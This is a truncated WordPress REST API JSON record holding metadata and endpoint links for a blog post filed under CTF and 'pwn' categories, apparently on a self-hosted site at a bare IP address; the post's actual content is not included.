[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":115,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,19],"tags":[],"class_list":["post-179","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf-and-protest","category-pwn"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/179","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=179"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/179\/revisions"}],"predecessor-version":[{"id":180,"href":"http:\/\/1
62.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/179\/revisions\/180"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media\/115"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=179"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=179"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=179"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}